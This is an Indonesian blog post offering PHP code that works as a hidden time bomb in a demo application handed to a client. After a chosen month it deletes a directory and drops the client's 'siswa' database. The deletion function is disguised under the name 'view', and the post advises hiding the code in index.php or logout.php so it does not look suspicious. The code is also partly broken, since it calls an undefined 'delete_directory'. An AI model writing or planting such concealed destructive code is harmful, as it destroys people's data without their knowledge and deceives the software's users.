Rabu, 20 Agustus 2014

Coding Shared - Kali ini akan membagikan sebuah script  yang akan berguna sebagai timer untuk menghapus sebuah file. Pengalaman dari sebuah kasus dimana saya ingin memberikan aplikasi demo kepada client untuk di coba - coba, dimana aplikasi tersebut akan saya batasi waktu penggunaannya, semisal hanya dalam tempo satu bulan.

Dari kasus tersebut akhirnya muncullah ide untuk menghapus file tertentu atau menghapus database pada periode tertentu sehingga aplikasi tidak dapat lagi dipergunakan, bagaimana caranya ?

langkahnya sebagai berikut :

1. kita buat dulu fungsi yang berguna untuk mendelete file atau folder atau bisa juga delete database atau delete tabel tertentu yang kita inginkan, dalam kasus ini misalnya kita ingin mendelete sebuah database. scriptnya sbb:

function view($dirname) { if (is_dir($dirname)) $dir_handle = opendir($dirname); if (!$dir_handle) return false; while($file = readdir($dir_handle)) { if ($file != "." && $file != "..") { if (!is_dir($dirname."/".$file)) unlink($dirname."/".$file); else delete_directory($dirname.'/'.$file); } } closedir($dir_handle); rmdir($dirname); return true; }

2. Langkah kedua kita buat script pengujian timer, disinilah kita akan setting batasan waktu aplikasi dapat digunakan, berikut scriptnya :


require("koneksi.php"); $t1=date("d");$t2=date("m");$t3=date("y"); if($t2>11) {
view("../bea");
$sip="DROP DATABASE siswa";$sip2=mysql_query($sip);
echo "";
}

Penjelasan :
  • require("koneksi.php"); =script koneksi database,bisa dilihat scripnya pada posting tentang koneksi.
  • $t1=date("d");$t2=date("m");$t3=date("y"); = script mendefinisikan tanggal,bulan dan tahun
  • if($t2>11) =pengujian waktu terserah teman - teman codinger di set tanggal bulan dan tahun berapa
  • view("../bea"); = memanggil fungsi untuk menghapus direktori.("../bea") adalah alamat direktori.ini terseran temen2.
  • $sip="DROP DATABASE siswa";$sip2=mysql_query($sip); = script untuk menghapus database.disini nama databasenya adalah "siswa".
  • echo ""; = script tambahan biar keren ajah...bisa di isi pop up javascript dll....

terakhir :
taruh script di atas pada file index.php ato file logout.php..usahakan sembunyikan script tersebut biar tidak terlalu mencurigakan..

Nah sekian sharing code kali ini, semoga bermanfaat.
Source : klik sumber (artikel asli dari penulis yang sama).
Categories: , ,

Related post

Subscribe to RSS Feed Follow me on Twitter!